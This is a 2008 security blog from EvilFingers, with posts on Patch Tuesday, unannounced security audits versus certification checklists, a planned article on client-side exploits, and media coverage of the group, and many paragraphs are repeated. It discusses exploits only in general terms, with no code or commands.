Let us know if you wish to volunteer and we will see what we can do for you. We have our volunteer page listing all positions. We donot expect you to help us full-time, though we would need commitment to a certain level to complete the projects as quick as possible, so as to not leave the site partially done.
- EF
Web Design & Website Development
- CSS Personnel
- Animations Specialist
- Content Management Specialist
- Web Designer
Let us know if you wish to volunteer and we will see what we can do for you. We have our volunteer page listing all positions. We donot expect you to help us full-time, though we would need commitment to a certain level to complete the projects as quick as possible, so as to not leave the site partially done.
- EF
Patch Tuesday
Microsoft releases security patches in second Tuesday of each month. Exploit Wednesday, known after the name "Patch Tuesday" is coined by the exploit writers who tries to analyze these patches to find more vulnerabilities to write exploits. Even though, these exploit writers are writing exploits against such vulnerabilities, they are helping Microsoft by performing free analysis and vulnerability exposures.
EvilFingers is planning on bringing a page on Patch Tuesday and Exploit Wednesday analysis. We only wish to maintain a balance in the field of information security. If you(our reader) is willing to contribute to any of our projects, you are most welcome to contact us at contact.fingers {at} evilfingers.com.
Microsoft Technet Security Page is where we can find the security listings on the vulnerabilities identified by Microsoft. September 9, 2008 is their next release on Patch Tuesday. Check it out when you get a chance as there is always something interesting in there.
- EvilFingers
EvilFingers is planning on bringing a page on Patch Tuesday and Exploit Wednesday analysis. We only wish to maintain a balance in the field of information security. If you(our reader) is willing to contribute to any of our projects, you are most welcome to contact us at contact.fingers {at} evilfingers.com.
Microsoft Technet Security Page is where we can find the security listings on the vulnerabilities identified by Microsoft. September 9, 2008 is their next release on Patch Tuesday. Check it out when you get a chance as there is always something interesting in there.
- EvilFingers
Sunday, September 7, 2008
Certification & Accreditation - Does it really work?
Certification & Accreditation (C&A) is a well known myth used by organizations to prove that they are certified and accredited. Does this really certify that the organization is secure and that there is no data breach. DataLossDB lists several data loss incidents and many options for users to get their search results. This depends on the process used by a C&A group to certify a company. If a C&A personnel is going to carry a checklist asking questions such as "Does the company have rogue access points?" and if the C&A personnel is going to look around for stuff or ask the local manager such questions, then it might never be the real results. Is the company NOT going to keep itself clean when they know that they are to be audited this week or next week.
The best solution would be to perform vulnerability analysis without prior notice to the organization. That would really help the company to know how much they are really secure and if they are really worth a C&A. Though this is not practical in real life, we really wish that this would happen soon. This is performed by some of the organizations around the world and they have been protecting themselves against the real attackers. A real attacker would never give prior notice before any attack and so should the good ones do to really certify an organization.
- EF
The best solution would be to perform vulnerability analysis without prior notice to the organization. That would really help the company to know how much they are really secure and if they are really worth a C&A. Though this is not practical in real life, we really wish that this would happen soon. This is performed by some of the organizations around the world and they have been protecting themselves against the real attackers. A real attacker would never give prior notice before any attack and so should the good ones do to really certify an organization.
- EF
Saturday, September 6, 2008
Client-Side Exploits
EvilFingers.com has taken its time in concentrating on client-side exploits. This does not mean that we wear different hats or that we use it for malicious purposes. Anushree, a team lead of client side exploits has written an article on client-side exploits that would be published in Nov 2008 at Hakin9. This article involves intro to the making and working of client-side exploits, clear classification of client-side exploits and their mitigation techniques.
Ion and Anushree are now planning on writing the second version of the same article, which involves more indepth analysis and research on client-side exploits. We (www.EvilFingers.com) have noticed that we should concentrate on exploits in particular, rather than the semantics behind it as we believe that each exploit has its own importance.
The trend in exploits was first seen against the servers and server softwares. Then the exploit writers concentrated on the client-server side, and targeted web based applications (webapps). Now we see the trend moving towards client-side software. Even though this trend was seen since 2005, this has increased exponentially and we now have 100's-1000's of exploits a day. 1000's may sound exajurating, though what we mean is that we see a great increase in client-side exploits and hence we wanted to throw some light on it. Milw0rm has a great listing of Client-side exploits.
Please do leave your comments at contact.fingers {at} evilfingers.com. We do appreciate both good and bad comments as we believe that every single comment is important for us.
- EvilFingers
Ion and Anushree are now planning on writing the second version of the same article, which involves more indepth analysis and research on client-side exploits. We (www.EvilFingers.com) have noticed that we should concentrate on exploits in particular, rather than the semantics behind it as we believe that each exploit has its own importance.
The trend in exploits was first seen against the servers and server softwares. Then the exploit writers concentrated on the client-server side, and targeted web based applications (webapps). Now we see the trend moving towards client-side software. Even though this trend was seen since 2005, this has increased exponentially and we now have 100's-1000's of exploits a day. 1000's may sound exajurating, though what we mean is that we see a great increase in client-side exploits and hence we wanted to throw some light on it. Milw0rm has a great listing of Client-side exploits.
Please do leave your comments at contact.fingers {at} evilfingers.com. We do appreciate both good and bad comments as we believe that every single comment is important for us.
- EvilFingers
Friday, September 5, 2008
Media Support
Though security community is a bit reserved, some of the organizations do anything to come in the media. EvilFingers did nothing and yet we are in the media. Thanks to media support, we love you guys and you guys definitely rock. We thank you for all your support in publishing our efforts. Do not hesitate to contact us at contact(dot)fingers (at) evilfingers.com if you have any questions or comments for us.
Just an FYI, the following are noteworthy listings:
- http://blogs.zdnet.com/security/?p=1847
- http://www.informationweek.com/news/internet/google/…
- http://news.cnet.com/8301-1009_3-10031250-83.html
- http://www.cio.com/article/447276/Early_Security_Issues…
- http://www.vnunet.com/vnunet/news/2225318/security-world…
- http://www.securiteam.com/securitynews/5TP010UPFU.html
- http://www.pcworld.com/article/150639/.html
- http://www.pcadvisor.co.uk/news/index.cfm?newsid=103910
Thanks to everyone once again, for supporting us in all our efforts.
- EF
Just an FYI, the following are noteworthy listings:
- http://blogs.zdnet.com/security/?p=1847
- http://www.informationweek.com/news/internet/google/…
- http://news.cnet.com/8301-1009_3-10031250-83.html
- http://www.cio.com/article/447276/Early_Security_Issues…
- http://www.vnunet.com/vnunet/news/2225318/security-world…
- http://www.securiteam.com/securitynews/5TP010UPFU.html
- http://www.pcworld.com/article/150639/.html
- http://www.pcadvisor.co.uk/news/index.cfm?newsid=103910
Thanks to everyone once again, for supporting us in all our efforts.
- EF
Thursday, September 4, 2008
Hello Readers
Welcome to EvilFingers.com official blog!!!
We represent www.EvilFingers.com to spread the word and share our thought process to the Security community. We would like to introduce ourselves to you (our blog reader).
Ion Visser and Anushree Reddy would be the bloggers of this blog from here on. Thank you so much for visiting our blog.
- EvilFingers
We represent www.EvilFingers.com to spread the word and share our thought process to the Security community. We would like to introduce ourselves to you (our blog reader).
Ion Visser and Anushree Reddy would be the bloggers of this blog from here on. Thank you so much for visiting our blog.
- EvilFingers
Subscribe to:
Posts (Atom)